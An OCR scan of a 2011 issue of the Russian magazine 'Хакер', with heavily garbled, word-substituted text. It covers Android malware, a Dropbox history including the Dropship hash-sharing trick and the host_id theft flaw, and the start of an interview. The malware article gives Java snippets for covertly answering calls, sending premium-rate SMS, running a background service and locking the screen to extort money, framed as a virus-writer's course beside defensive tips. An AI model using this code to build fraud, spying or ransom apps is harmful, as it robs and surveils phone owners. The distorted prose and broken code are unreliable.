развивать кровный софт. С точки зрения злоумышленника ты да я имеем труд от банальной со­ циальной инженерией . Кто смотрит держи разрешения, которые запрашивает конспект для того

rtiiMIIIIil

у вместе с тановки? А который во них разбирается? Ведь каждая , совершенно банальная

:1. Давай

П е рвые не без; ерьезные жалобы у владельцев андрафанов появились во

равным образом легальная расписание требует себя целую кучу прав.

январе з ведь го года. Я уверен, что-то малварь существовала да накануне этого, так

смотрим, какие шаги предпринимают хитрые вирмейкеры с целью того,

была локализована получи и распишись всяких форумах со пиратским софтом . Основной

чтоб наживить близкий пиратский софт держи телефоны пользователей.

а говор поднялся во марте, в отдельных случаях отсюда следует известно, что-нибудь на формальный

0.

маркет

Google

по­

« ОфициальныЙ >> функционал. Приложение надлежит самую малость делать. Или пусть бы бы организовывать тень деятельности, воеже во вкусе не запрещается

пробрались фейковые приложения, которые втихую во­

руют личные данные, рутяттелефон равным образом открывают бзкдор . Несмотря бери

длиннее перебиться насмартфоне скольжение ера. Условие, конечно, необя­

то, что-нибудь

зательное- позволительно « произвести ВИД >> , зачем утилита вылетела, а

Google

пропустила вредоносные приложения во маркет, компа­

ния ужас бегом реабилитировалась , удалив аккаунт злоумышлен­

самому втихаря растворить бэкдор, послать пару СМС в оплачиваемый

ника (Myouгnetl, вполне софт, какой спирт выложил, а вдобавок удаленно деинсталировала установленные приложения от телефонов.

номер, сграбить телефонную книгу равным образом т.д.

0.

Сразу а активизировались компании , создающие софт согласно защите от вирусов, да начали пачками беречь во маркет антивирусы .

К началу августа шумиха из малварью капелька спала, так шелковица

GuitarSolo Lite Super GuitarSolo, бери освещение появились SupeгSex Positions да Hot SexyVideos. Идея ясна, отнюдь не этак ли? Да , племя поперед этих пор клюет получай всякие громкие приставки как <<Super >>, <<Hyper>> равно халяв­

ную порнушку :1.

квалифицированная новостных сайтов сызнова затрубили, ась? появился вирус, тот или иной вдобавок « стандартного >> похищения личных данных

Красивое обозначение . Посмотри нате проба Myouгnet:

<<превратилась >> на

0.

Боевой кон тент. Основная направленность малвари-это собрание

пока что да з аписывает телефонные разговоры. Работает симпатия следующим

всевозможной информации: СМС, телефонные книги , исходняк

образом : присутствие каждом звонке расписание активизируется да сохраняет

протокол телефонны х звонков равным образом прочее. Думаю, аюшки? пройдет каплю

GPS,

болтание получи карте памяти во папке /shaпgzhou /callrecoгd во формате

времени, равным образом появятся целые ботнеты изо мобильных телефонов,

• .аmг. Выяснить , отправляет ли возлюбленная зти дневной журнал куда-нибудь, ми приближенно равно

у читывая, что-нибудь сейчас не откладывая питаться вирусы, которые обладают во всем необ­

безграмотный браво со ь , вследствие чего который информационные список литературы разнятся на пока-

х одимым к сего функционалом.

ХАКЕР

01/154/2011

089


MALWARE

--

!1 !1 :.

AvailaЬie

08:17 Memory:

05М

· · · , · · - ··· -· · ·· '

------------------------------

КILL

Защищаемся через прытких товарищей

КОВЫРЯЯ

Скрыться с Advaпced task killer бери андроидахпока далеко не удается

GOOGLE++

Возвращаясь ко н едавним событиям равно

selected apps

Ответ для

Google++, нужно направить

интерес сверху исследования, которая провела равным образом описала во своем

благе пароходство Тгепd Мiсго. Ребята рассказали страждущим, каким образом мобильный телефон переходил во медленный политическое устройство да помаленьку поднимал трубку. Я привел ссылку сверху их заметку, равно твоя милость можешь самостоятель­ но составить себя понятие со всеми подробностями. Здесь но ваш покорный слуга покажу самое

вкусное: пару функций, которые позволят перебросить светофон в беззвучный нагрузка равным образом отозваться в звонок. Переход во приглушенный общественный порядок

звонок равно диссимуляция уведомления что до нем

private void answerCall() { try { PhoneUtil.getiTelephony(this .tm).silenceRinger(); boolean bool=PhoneUtil.getiTelephony( this .m). showCallScreenWithDialpad( e ); PhoneUtil. getTelephony( this . tm). answerRingingCallO; Thread.sleep( SeeL ); goToHomePage(); setKeyguard( e ); return ;

private void silenceResponse() {

}

int i int j

Log.w( "spy ", "silenceResponse" ); this .audioManager.getRingerMode();

ОТПРАВЛЯЕМ СМС Наверное, самый признанный недуг, каковой поражает абсо­

this .oldRingerMode j; int k=this .audioManager.getVibrateSetting(e ); this .oldRinger=k; int m=this .audioManager.getVibrateSetting( l );

лютно безвыездно мобильные платформы- зто приложения, которые низко

this .oldNotification=m;_ this .audioManager.setRingerMode( e ); this .audioManager.setVibrateSetting(e , this .audioManager.setVibrateSetting( l ,

Отправляем СМСку

}

090

отправляют СМСки нате платные номера. Посмотрим, равно как сделать такое приложениена Andгoid. В сущности, всегда невероятно просто: нужно как только применить классом SmsManageг:

private static final int ReqCodeSms

=

023 ;

е ); е );

synchronized void SendSms( String phone, String t~xt){

puЫic

ХАКЕР

01 / 054/2 011


Больные роботы

Pendinglntent Result=createPendingResult( ReqCodeSms, getlntent(), е ); SmsManager.getDefault().sendTextMessage(phone, null , text, Result, null);

Activity" ></service> Здесь Seгvice_Activity- сие титул сервиса. Теnерь нужно объявить класс, описывающий сервис, а да его пуск равным образом остановку:

} Код во комментариях малограмотный нуждается, шелковица однако попросту равным образом понятно. Это­

Класс,

оnисывающи й от ервис

puЫic

class Service_Activit y extends Service {

го достаточно, так чтобы капелька подкалымить ради вычисление пользователя.

Кстати, совершить сие дозволительно да вместе с через Scгipting Lауег Fог Andгoid, относительно

private Timer timer=new Timer(); puЫic void onCreate(){ super.o nCrea t e(); start se r v ice();

котором моя персона писал во августовском номере.

ВОЗМОЖНО ЛИ СКРЫТЬСЯ ОТ ТАСККИЛЛЕРА? Этот дилемма волнует многих разработчиков, равно автор часто встре-

}

чаю его возьми форумах. К сожалению, ни я, ни отличаются как небо и земля андраид­ с ообщества неграмотный нашли корректно работающих способов отпасть ото

private void startservice(){

вездесущих таскменеджеров. Даже ежели умельцыискрывались от встроенного таскменеджера подле помощи различных костылей, их не­

пременно вычислял Advaпced

timer . sc hed uleAtFixedRate( new TimerTask(){ puЫic void run (){

Task Kil l eг. Поэтому мое мнение: самое лучшее

j} Ту_т мож да выnолнять

выдумать какое-нибудь звучное равно умное наименование , в надежде пользова­ тель побоялся хоть ненароком решить безграмотный через силу полезную софтину.

// заnланиров а нны е мол й ствия

КОДИМ СКРИНЛОКЕР

}, е , 0еее );

Популярность СМС-вымогателей к винды сделано показала, почто злоу­

мышленник тотально может срубить бабок получай наивных пользователях,

}

отчего раздумье портировать эту идею в целях Апdго i d-устройств кажется вполне логичной.

private void stopservice(){ i f (timer !=null ) { timer.cancel();

Первое, что-нибудь приходит возьми ум,- содеять личный скринлокер. К счастью на пользователей, свершить сие отнюдь не где-то свободно . Во-первых, по­ литика безопасности Aпdгoid такова, зачем читатель всякий раз может

Home, равным образом если другие фортепьяно правонарушитель может заблокирова т ь, так Home

}

иссякнуть изо любого приложения в соответствии с нажатию фоно

}

остается неприступной. Второй появление с ситуации - выгнать в три шеи являвшийся личной собственностью паттерн

Для наглядности ваш покорный слуга трогай самым элементарным способом­

блокировки аппарата равным образом развязно предложить явиться от пользователя финансы после

нетрудно создал таймер, кто полноте реализовывать запланированные

заветную комбинацию. Но на этом месте злоумышленники вновь сталкива­

образ действий со заданным интервалом . В реальном примере код, конечно,

ются вместе с проблемой: сверху нерутованном девайсе [а таких большинство!,

усложнится, же экстракт на целом останется праздник же. Теперь все, зачем нужно

обтяпать таковский ухищрение неграмотный удастся. П оэтому коли кому-то захоче т ся

-это прямо потребовать е г что до изо активити.

писать неизвестно что подобное, придется порассудить н чистилище реализацией эксплоита, каковой хорош попервоначалу рутить девай с, а позже поуже довольно

обучаться вымогательствам [нелегкие деньги, за всем тем

:11. Да,

равно невыгодный

КАК ТЕПЕРЬ ЖИТЬ? Сейчас позволительно сказать, что-то предмет внимания мобильной малвари находятся

желательно забывать, что-то малограмотный целое устройства ведут себя тождественно равно коррек­

на зародыше, только изо сего зародыша со временем безусловно может возрасти

тно со временем получения гооt-прав, того на смену того, чтоб выпол­

здоровый монстр. Количество андроидафон об на растет на геометриче­

ворса свое предназначение, утилита может остановиться иначе говоря [скорее

ской прогрессии, здоровый небесная империя со т нями кует пятидесятибаксавые

всего! без труда вылететь, а легковозбудимый юзер может борзо

смартфоны да рассылает их согласно по всем статьям миру ... А

отчубучить хард-ресет, равно всё произведение пропадет даром.

ботчикам упростила способ приложений во маркет, тем самым сделав

Таким образом, самое опасное, что-то не грех свершить подле помощи

API Aпdгoid, никак не прибегая ко ухищрениям,- сие без затей шибануть бло­ кировку экрана. Делается сие на Aпdгoid 0.2 следующим образом:

Google

во угоду разра­

возможным интервенция во него вредоносного ПО. Пока такого софта немного, да ассоциация добра конец оптимистически справляется с его чисткой, да ась? будет, ежели контингент зараженных программ начнет расти? Не будем основывать догадки, а отпустило подумаем, как бы

Про г ра ммны й заnу ск бло ки ямища ки э для ранение

сделать попытку предохранить себя. Первое, в чем дело? стоит только сделать,- сие

DevicePolicyManager devicePolicyManager (DevicePolicyManager) getSystemServi ce( Context . DEVICE_POLICY_SERVICE); devicePolicyManager.lockNow();

сберечь видеотелефон через физического вторжения [например, твой товарищ захочет постичь бери твоем телефоне самописный троянчик,

все еще твоя милость отлучился ненадолго!. Обломать такого товарища можно элементарно: поставив частный паттерн про разблокировки

клавиатуры. Делается сие на разделе Locatioп Можно подраздеть сие таким образом, дай тебе щит у пользователя блокировался каждые ряд минут, что такое? на конце-кон ц ов приближенно его достанет, сколько некто плюнет равным образом отправит заветную СМ С.

& secuгity

настроек

твоего телефона.

Второй совет: за всем тем бегать других источников приложений, кроме официального мар кета, да отключить во настройках опцию << До­

КУРС ЮНОГО ВИРМЕЙКЕРА: ИСПОЛНЕНИЕ В ФОНЕ

верять неизвестным источникам >> - да, наша сестра себя ограничиваем, только

бывают моменты, когда-никогда опасение важнее. Далее: рядом установ­

Для выполнения фоновых задач во Aпdгoid очищать инструмент- серви­

ке приложения завсегда обращай заинтересованность нате производителя да сверху

сы . Рассмотрим конструкцию простейшего сервиса . Откроем

название, равно ежели лакомиться какие-то неувязки, ведь полегче чрезмерный единожды по­

Eclipse

равно создадим в дальнейшем последний план про андроида. Прежде всего, нужно

гуглить, нежели позднее зевнуть важной информации. Если но твоя милость решил

признать услуги во файле AпdгoidMaпifest.xml. Делается сие следую­

ведь ввести приложение, обрати забота в разрешения,

щим образом:

которые ему требуются . Понятно, в чем дело? немедленно всё-таки приложения хотят как дозволительно лишше доступа, так лишняя благоразумие вновь никому безвыгодный

cservice

ХА К Е Р

android:enaЫed="true"

01/154/2011

android : name=".Service_

мешала. :::К:

091


СЦЕНА

печальная

«Mifrill>>Нефедова [mifril llagameland.rul

Три годы вспять об DгорЬох никто никак не слышал . Сейчас о нем знает символически ли невыгодный каж-

дый . Как нищенский коман­ де программистов посчастливилось

превратитьбесхитростную

идею во сервис, вне которо го неграмотный представляют себя

век капитал людей по всему миру? Этот стезя был интересен равно поучителен .

Основатели и авторы

092

ХАКЕР

Dropbox

01/154/2011


Коробка на об л аках

ropbox

DROPBOX: ПУТЬ ОТ ИДЕИ

ДО25МИЛЛИОНОВ

ПОЛЬЗОВАТЕЛЕЙ

ОТ ИДЕИ ДО СТАРТА

программируетс 0лет, а отзывчивость во различных

Создателями равно основателями сервиса DгорЬох

стартапах принимаете 04лет. Никакой ошибки

считаются двуха человека: 07-летний янки

после этого нет, без труда прежде нами очередное юное

Дрю Хьюстон равным образом его ровесник, иранецамери­

дарование. Кстати, до смерти непосредственное-в

канского происхождения Араш Фирдоуси . Идея

поисках инвестиций на DгорЬохДрю расска­

DгорЬох'а, как бы сие да иногда со многими гени­

зывал инвесторам по части том, что такое? прошлым в летнее время он,

альными идеями, пришла во голову Хьюстону

смеха для , реверс-инжинирил софт нескольких

неумышленно . Дрючасто приходилось трудиться после

покерных сайтов равно написал играющий возьми на­

несколькими десктопами да ноутбуком, а трепать

стоящие деньги, примерно выгодный покерный

файлы бери флешке, которую дьявол систематично в круглых цифрах

бот. Скриншот прилагалея :). Тем отнюдь не менее, чрезвычайно

забывал, быложутко неудобно. К томуже на этом

скоросталоясн~чтосправитьсяводиночкус

0

НЕСТАНДАРТНЫХ

СПОСОБОВ ИСПОЛЬЗОВАТЬ

DROPBOX

случаенельзябыло гарантироватьсохранность

поставле н утнапиштим задачей Хьюстону, увы, безвыгодный п од силу.

данных . Когда вдругсгорел его электронная вычислительная машина дружно

Тогда-то дьявол да обратился после через для своему

DгорЬох успешно используют во качестве

от жестким диском, Дрю строго задумался атом,

приятелю, равно как студенту МТИ, АрашуФирдоуси .

хостинга на небольших сайтов.

дабы пере н ести файлы во облако. Во-первых,

П оследний, нужно отметить, получи и распишись оный моментучился

для того большей сохранности. А второе , ради того,

сейчас для

с целью позволяется было пользоваться для ним отколь

перспектив решился запустить институт. Парень далеко не

0 курсе, да в угоду интересного проекта да

угодно. Наш царица п робовал р азличные сервисы

насчет г адал - н а известный момен т Фирдоуси является

дляоблачногохраненияданных.Однаковсеони,

техническим директором компании DгорЬох.

Сохранять во DгорЬох сейте ваш брат к игр,

неравно вдуматься, равным образом смертельно рационально .

по мнению его словам, «с традали через лагов, ба го в, плохо

реагировали получи и распишись старшие файлы !или общий невыгодный

С DгорЬох не грех синхронизироватьлаги

Skype, QIP равным образом других мессенджеров.

ПОИСК ИНВЕСТОРОВ

работали со н ими) равным образом во целом заставляли пользова­

Когда на 0007 году наступающий Драпбокс обрел поуже

DгорЬохможетпослужитьнеплохим

телок чрезмерно целый ряд думать>> . Д альнейший сце­

основательно конкретные очертания, Фирдоуси равно Хью­

дополнением ко охранной системе ПК.

нарийзаслуживает5балловврейтингепошлых

нытье основали компа н ию DгорЬох l пс. равно принялись

success stoгy, вследствие чего что-то Д рю решил сочинить

искатьинвесторов. П ар н ипонимали,чтоподнять

С через DгорЬох мелочёвка привести в порядок уда­

велосипед. Сделатьсвой сервисдлясинхрони­

проектсамостоятельно,оплачиваяхостинг

ленныйзапускскачиванияторрентов .

зации файлов. И амором осознал, в чем дело? работа

для того такого количества файлов, «на карманные

можетбытьполезнанетолькоем~

деньги» довольно немудрено до черта . В Сети прежде

этих пор дозволено выискать копию заявки I Ьit.ly/гaHM 0 К ),

Больше анестандартныхспособах

отправленной Хьюстоном на бизнес-инкубатор У

применения сервиса позволено проведать

До работы надо DгорЬохХьюстон сделано успе л поуча­

СоmЬiпаtог. Из нее, ко примеру, не запрещается узна т ь, сколько

ствовать на таких стартапах в духе Bit9, Accolade да

про написания да обслуживания первого рабочего

во официальной Wiki проекта: wiki .d горЬох .com/TipsAпdT гicks .

Hubspot, где-то что-то отчетливый компетенция ради плечами

прототипа использовались Python, sqlite lв кли­

ПЕРВАЯ КОМАНДА

у него ранее был. Для тех, ко т в отношении люби т подле д ираться для

ентской части), mysqll н a сервере), фреймворк

фактам да неграмотный поленится подсчитать, поясню: Дрю

tuгbogeaгs да главное-Аmаzоn ЕС2 равным образом 03 к

Х АКЕ Р

01/154/2011

093


~ЦЕНА

БАГИ И НЕПРИЯТНОСТИ За безвыездно период существования служба

Cost per acqшs1t10n . $233-$388 For а $99 product. Fшl.

Кадр иэ преэентации, посвященн в отношении й равно стории сервиса .

Маркетинг строго далеко не удалея

:)

ав т оризации DгорЬох используетименно

ВеснойтекущегогодаDгорЬо х попытался

равным образом всего-навсего з начение host_id, а обложка coпfig . db

аннулировать публичный насчет е кт Dгopship. Все

портативен равно никак не связан от системой . Та ким

началосьсвнесениявпользовательское

образом, калькирование coпfig.db бери др угую

пакт изменений , которые обозна­

машину равным образом включение DгорЬох неотложно

чили возможностьдешифровки приватных

синхронизирует этусистемусаккаунтом,без

данны х клиентов равно их передачу по части запросу

уве домленияполь зо вателяидажебе звне ­

правоо храни т ел ьны х органов.

сения новой системы на вместе с писок доверенн ых.

Dгopship , на свою очередь. распростра­ нялся подлицензией

MIT да давал пользова­

Dropbox привп екает

Хуже того, пользовательдаже синь порох безграмотный за­ метит, а разве возлюбленный сменит лаги н равно движение роль, в свой черед

телямвозможностьисполь зо ватьDгорЬо хв

н ичего отнюдь не изменится-hоst_id всё-таки равн что до около

качес тв еаналогафайлообменнойсети.Все

этом останется валидным.

строилось для клю ч евом принципе DгорЬох:

Еще безраздельно диапозитив иэ преэентации. Как пользователей.

авторизации да малограмотный меняется со временем. Для

далеко не мо г привыкать не принимая во внимание заметных фейлов.

Не положительно радужны равно изменения , никак не

коли у поль зо вателя естьхэш файла, хра­

такдавновнесенные во пользовательское

нимого на публичном каталоге DгорЬох, так

соглашение. В FAQ DгорЬо х до тех пор было на­

любойпользовательDгорЬохможетскопи­

писано: « целое файлы зашифрованы AES-256

ровать первообразный обложка на частный являющийся личной собственностью

равным образом далеко не могут оказываться расшифрованы минуя вашего

каталог. То сделал ть, доп устим, имея серия

пароля ». Потом пункт по отношению батман роле да невоз­

.аvi - файлов, позволительно выложить хэ ш . да кроме

можности расшифровки слабо -т по отношению пропала , равно

DгорЬо х предоставит этот обложка множе­

последняя вычитывание пользовательског по отношению со­

ству аккаунтов. Автор Dгopship- владеть миром

глашения объединение этому вопр осу сегодня выглядит

вандер Л а ин -сообщил , что-нибудь на протекание

так: « Сотрудникам DгорЬ ох запрещено про­

нескольких часов l!l затем того, на правах пр оект

наблюдать контент файлов, которые хранят

был анонсирован бери сайте Насkег News, не без;

поль зовате ли во своих папках, им разрешено

ни м связался Араш Фирдо усище равно равно «вежливо»

всего только просматривать метаданные, такие

попросил прибрать проектс github. Ван дер

по образу имена файлов равным образом пути•.

Л а ин послушался. Поль зовател равным образом Dгopship

П озицияDго рЬохсводитсяктом~чтоони

отреагировалинаслучившееся созданием

отродясь неграмотный утвержда ли , почто малограмотный х ранятус ебя

многочисленны х зеркал проекта , как бы получи

криптографических ключей, в таком случае есть, говорят ,

хостингасерверовихранени яданны х.Интересн~

github, таково равным образом получи и распишись самом DгорЬо х . Но во направление

они безлюдно равно н е обманывали.

какХьюстонподавалсвоейпроектпотенциаль­

короткого времени данны е юзеры вдобавок по­

ным инвесторам да держи сколько именноделал упор. Ниже

лучили просьбуотпредставителей DгорЬо х

мы приведу серия цитат изо заявки:

об удалении зеркал . В итоге ливрезон

USENIX Secuгity Sym posium были пред­

практическиисчезлои зи нтернет~апочти

ставленысразунесколькоуязвимостейв

<< Если взятьлучшее oтsubveгsioп, !гас да гsупс

В эпилог скажу. что такое? на конце августа 2011годанасим позиумепобезопасности

изаставить«простоработать»врукахсредне­

по сию пору его публичные репазитарии равным образом архивы

DгорЬо х. Сейчас до сей времени они сделано закрыты- ис­

статистического потребителя alias гр у ппы

были свернуты.

следователи разработали зксплойты сызнова

таковых- получится DгорЬох ». « Я нахожуочень сме шными имена, которые

Еще единолично н е положительно смачный инцидент п роизошел всегда праздник но по весне

0011, получай таковой

на прошлом году да дали DгорЬох срок на

устранения пр облем, раньше нежели пр яство т ь

народище вынуждены вкладывать своим документам,

крат некто был связан со безопасностью DгорЬох.

их огласке. Тем далеко не менее, исследователям

во целях отражения «версио нности >>. Знаете,

Да нная весть распространилась п что до Сети

посчастливилось поддел а ть хэш-значе н ия данны х,

вроде: • предложениеv2 оказывается рас­

со скоростьюлесного пожара равно породила

хранимых во облаке DгорЬох. Удало из ь про­

смотренное НОВЫЙ 01-15-06 .do c».

м н ожество споров. В DгорЬо х обнаружили

отыграть кражу ID хоста жертвы. И молодецки сь

«Су ществуют хорошие решения на синхро­

уязвимость. Найденная брешь оказалась,

обманывать атаку, использующую преим у ще­

ни вслед за ции (Ьеiпsупс, Foldeгshaгel . существуют

во общем-то, непустяшной: весь рукоделие на

ствофункции,котораяпозволяетклиентам

удобныетузлы ради бека батман (СагЬопitе, Mozyl.

файле coпfig . db, хранящемся за адресу

DгорЬо х просить фрагменты файлов

лакомиться опять же да сетевые сер висы пользу кого загрузки/

% APPDATA%\Dгopbox равно являющем лицом

вследствие SSL объединение определенному URL. Все который

публикации контента, - всё-таки блистает своим отсутствием удобного

таблицубазы данных. В таблице всеголишь

ничего не поделаешь -это хе ш-значение фрагмента

интегрированного реше ни я».

три полина -

« Работу надо проектом аз многогрешный начал

0 месяца тому

назад. На текущий секунда написано эскизно 0

email, dгopbox_path равным образом host_id. По­

да какой угодно действительный ID, факультативно ID

сле дн ее поляна н е относи т ся ко опреде л енному

хоста, для которому привязан запрашиваемый

хосту, назначается системе в дальнейшем первой

фрагмент.

твоя милость с. не без; тр ок стих для того клиента равно 0 твоя милость с. строк кода для сервера . Это адрес в Pythoп равным образом С++, шаблоны

Cheetah, инсталлер-скри пты да пр . » . « Мы планируем проэксплуатировать fгeemium­ пoдxoд. раздавая аккаунты от квотой на 0 Гб и взимая платузадополнительное прогалина

[возможно подле $5, alias хоть не столь , для индивидуальных пользователей, сильная сторона тариф­ ные ожидание про групп, которые начинаются из

минимума - $20 во месяц!•. Усилия Хьюстона равно Фирдоуси безграмотный все как рукой сняло даром.

091,

ЗАТРАТЫ НА ПРИВЛЕЧЕНИЕ ОДНОГО ПОЛЬЗОВАТЕЛЯ О&ХОДИЛИСЬ В

КРУГЛЕНЬКУЮ СУММУ: $233-388, В ТО

ВРЕМЯ КАК САМ ПРОДУКТ СТОИЛ $99 ХАКЕР

01/154/2011


СЦЕНА

возвратить весь сие бери откуп профессионалам. Так равным образом по­ ступили. Наняв сверху работуумных равно дорогостоящих « nродажников >> равным образом SЕО-специалистов, DгорЬо х принялся по части купать ключевые трепотня во поискови ­

ках да лукаво подправлять страницы собствен наго сайта. Соль заключалась на том, что такое? ото людей,

пришедших в сайт в соответствии с «куп ленным ссылкам>>, прятали опцию создания бесплатного аккаунта, заменяя ее получай бесплатный, да односторонний по времени т риал. Низко пали создатели DгорЬо х, PuЫic

Photos

нет надобности отнюдь не скажешь. SЕО'шники хорошего далеко не по­

советуют:!. Каково но было всеобщее удивление (должно быть, чище всехудивлялись супер­ дипломированные маркетологиl, рано или поздно выясни­ лось , что-нибудь извод получи и распишись притягивание на стервис одного

........______, G~tting

~-November catlllog

Started

пользователя выливаются во кругленькую сумму:

$233-388, на так эпоха вроде своевольно продуктстоит$99 в год! Epic fail! В ся политика продвижениятрещала по швам : ключевые пустословие по правую сторону равно ошуюю пере­

DгорЬох как никогда пр восход равно понятен, не кто иной следовать сие его равным образом полюбила публика. Взгляни держи интерфейс

купалиськонкурентами,партнерскиепрограммы ирекламапочтиничегонедавали,асокрытиеоп­

Вапреле2007годаХьюстонполучил$15000от

« nасхальных яиц>>, способных порадоватьлюбого

циисозданиябесплатногоаккаунта,естественн~

известного инкубатора стартапав У ComЬinatoг.

гика. Расчетбыл прост--первичной аудиторией

оказалоськрайнесомнительным хо землянка . Команда

Следующие фошка месяца некто рачительно работал

сервиса явнодолжны были статьайтишники, охо­

DгорЬо х не без; ужасом осознала , чтоделать постоянно «как

надкодом,посвящаястартапупо15часоввдень.

чие предварительно новых технологий . И инда буде они решат,

принято>> издали малограмотный издревле з начитхорош касательно .

В сентябретого а годы Хьюстон равным образом Фирдоуси

в чем дело? продуктполный отстой, роликхотя бы их по­

переехали на Сан-Франциска, идеже на течениедвух

веселит равно им запомнится. И добро бы дивертисментный

недельдобивалисьвстречиспредставителя-

консигнатор был привнесен на видео вместе с умыслом, основная

ми венчурной компании

поручение ролика постоянно но заключалась во наглядной

Впрочем,приростпользователейвсеравнона­

несколькодней они преуспели во этом вопросе, равным образом

Sequoia Capital . Через

демонстрации работы DгорЬох равно рекламе старта

блюдался, да немалый: кавгусту2009 возраст схема

немного спустя у них получай руках былоуже $1.2 млн инвести ­

бета-теста. Опубликовав вал получи и распишись

ций . Послезапускасервисавсентябре2008года

ли DгорЬох несколько нервничали равным образом пусть даже сделали

допущенные ошибки, DгорЬох продолжал повышаться

компаниясумелапривлечьуже$l2млнинвести­

ставки--аудиторию какого размера им удастся

равным образом эволюционировать . Немало времени ушло у команды

ций. Процесс, в качестве кого говорится, уходи .

привлечь? По самым смелым прогнозам выходило,

стартапа получай прозрение сего парадокса. Впо­

почто в соответствии с ступит отнюдь не пуще 0-10тысяч заявок. Цифра

следствии самолично ДрюХьюст в рассуждении н объяснял сие тем ,

в15000заявокужевиделасьиммалореальной.

почто все распоряжение DгорЬох была сосредоточена получи

Digg, создате­

насчитывал сейчас

0 млн аккаунтов. Несмотря получи и распишись

совершенно

Каково но было их удивление, в некоторых случаях видео собрало

Оказалось, образовать хороший, способный обслуживание и получитьпервичноеодобрениеинвесторов-­ этодалеко безвыгодный главное. В

0008 году DгорЬох

больше 02 ОООдиггов, да ранее возьми следующийдень в wait-list встало 05 000 человек! После гулко го публичного запуска DгорЬох ,

заработал-- пришло сезон формироваться равным образом

состоявшегася возьми конференции TechCгunch50 во

занимать широкую аудиторию. И и так на первых порах

конце2008года,пришловремявыйтинабольшой

постоянно начиналось неплохо, незадолго возникли пер­

рыночек да приелекать для сервису широкие массы. Од­

вые сложности.

накодальнейшаястратегияХьюстона,Фирдоуси и Ко выглядела достаточно забавно. Дело во том, что-то

П ервоначальныйпланраскруткипроекта

был незамысловат. Еще получи этапезакрытой беты,

командапроектадосихпорбольшечемнапо­

в отдельных случаях DгорЬох проходил внутреннее тестирование,

ловинусостоит изо инженеров, а бери минута 0008

caйт getdгopbox.com уж лаконически информировал

годы она, чай , состояла изо них чуток больше нежели

забредшеготуда пользователя насчёт сути стартапа равным образом

полностью. Для продвижения равно маркетинга ребята

предлагал по всем статьям заинтересовавшимся насадить принадлежащий

собрались набрать << nони мающих людей>>-- РR­

email, встав во ряд вслед заветным приглашением. Когда во начале 0008 возраст настало пора беты согласно

агентство либо — либо какого-нибудь крутого маркетоло­

инвайтам,командаопубликовалавСетиинформа­

никак не было, легко они сочли, что такое? в один из дней олигодон на вопросах

тивный да забавный ролик, содержавший куча

продаж равным образом популяризации они любители, в таком случае нужно

га. Словом, конкретной рекламной стратегии у них

Уже после пару полет по прошествии благополучного запуска DгорЬох,входепрезентации,посвященнойистории сервиса, Дрю Хьюстон рассказывал атом, что-нибудь отнюдь не единожды да не два симпатия имел из инвесторами нижеперечисленный диалог: Инвестор: Но для рынке безотлагательно представлены состояние

стартапав облачных хранилищ! Зачем нам снова одно? Дрю: Вы пользуетесь каким-то изо них ? Инвестор : Нет... Дрю: Интересно, никак не так оно и есть ли?

096

ХАКЕР

01/154/2011


Коробка на облаках

создании максимальнокачествен н огаи простогов

использованиипродукта.ОгорЬохсоздавался«как

для того себя», на равно как эпоха разработчикиточно знали, что нужно коммьюнити. И сие самое коммьюнити, в свою очередь, обеспечило сервису огромную поддержку. Не безучастия п ользовательского сообществаостартапепоявилосьнемалопубли­

каций на IТ-прессе (в так период

NYTimes равным образом The Wall

StгeetJouгпal строчить касательно DгорЬох были покамест малограмотный готовы

:1, ктомуже уведомление что до сервисе запросто п ере­ даваласьизуствуста,распространяясьпоСети.

Отметив безвыездно сии интересные тенденции, компания,наконец,обратиласькдействительно грамотным специалистам да началатратитьде н ьги на аналитику, сплит-тесты итакдалее-словом, для

целое то, чеготак отнюдь не хватало вначале. Оказалось, что самым эффективным инструментом продвижения

былостароедоброе«сарафанноерадио~Человек пробует сервис, тотему нравится, -человек рас­

сказывает по отношению нем своимдрузья м. Чтобы стиму­ лироватьактивностьпользователей распадаться

радостями со своими ближними, была разработана реферальная схема . Смыслданной про­ граммы заключается во том, что такое? вслед регистрацию нового пользователя равным образом приглашающая край и приглашенная получают дополнительные равным образом совер­

шенно бесплатные 050 Мб места (в случае плащаница н ого аккаута +500 Мб). Всего возьми таких рефералах можно набрать накануне 0 Гбдополнительного халявного про­

странства (до

06 Гбдля студентов равно поперед 02 Гб держи

платных аккаунтахl. Это сработало! Лучше общей сложности картину проиллю­

стрируют цифры. На август201 О года, ведь вкушать всего месяц погодя задним числом старта реферальной програм­ мы, пользователи отправили друзьям

0.8 млн.

приглашений! Если на сентябре пользователей было просто-напросто 0ООтысяч, так для январю 0010 сталоуже 4 миллиона, а без дальних слов - поуже сильнее 05 миллионов. Реферальная схема обеспечила перманент­ ный 00%-ный выигрыш количества новых юзе ров.

ДОХОДЫ

DROPBOX

Правильно реализовав простую идею, обслуживание

превратился во большенный бизнес. За благонравный сер­ вис славно платить, равно человечество добром платят. Соз­ датели утверждают, аюшки? без дальних разговоров ради сервис DгорЬох платит приближенно

0% пользователей.

Выручка

компании на 001 О году составила $14 млн. Правда, существеннаячастьэтихденегуходитнаплату

Amazoп, у которой шатия согласно купает сервернее пространство. Между тем, слухи утверждаю т,

почто факты цифры занижены, равно реальная платеж

каждогодный выручки DгорЬох ближе для $30 млн. В те­ кущемгодуаналитикипрогнозируютвзятиеком­

панией планки на $100 млн. Согласно информации TechCгuпch, по части итогам очередного раунда финан­

сирования DгорЬох может приколдовать с $200 млн до $300 млн инвестиций, исходя изо общей оценки компании на

$5-6 млрд' Данные фонды сейчас не факт

ли «взяты не без; потолка>>, разве учесть, зачем на кон ц е

лета2011годакомпанияофициальнообъявила

об переезде на новейший грандиозный офис против старых

(8120 кв.м. 1022 кв.м . l равным образом рассказала, зачем во

ближайшее миг собирается увеличить табаско

сотрудников не без;

05 впредь до 000+ человек. Такого рода

из­

менения малограмотный происходят нате пустом месте. :::И:

ХА К ЕР

01 /154/201 0

097


СЦЕНА/И

098


АЛЕКСАНДР

«5H2KERR>> ПОЛЯКОВ

ЧЕЛОВЕК ИНТЕРВЬЮ С

ТЕХДИРОМ КОМПАНИИ

DIGITALSECURITY

Считается, зачем содеять на России производство

КАК ТЫ ПРИШЕЛ В СФЕРУ ИНФОРМАЦИОННОЙ БЕЗОПАС­

во области информационной безопас­

НОСТИ? КАК НАЧАЛАСЬ И РАЗВИВАЛАСЬ ТВОЯ КАРЬЕРА?

ности-ужас на правах сложно. Мы встрети­

лись со одним изо ярких представителей российской И Б-тусовки, кой делает

хорошую карьеру на этой сфере: ездит по лучшим мировым конференциям, а на

свободное ото перелетав пора создает с нуля дельце нате ни чуточки новом рын-

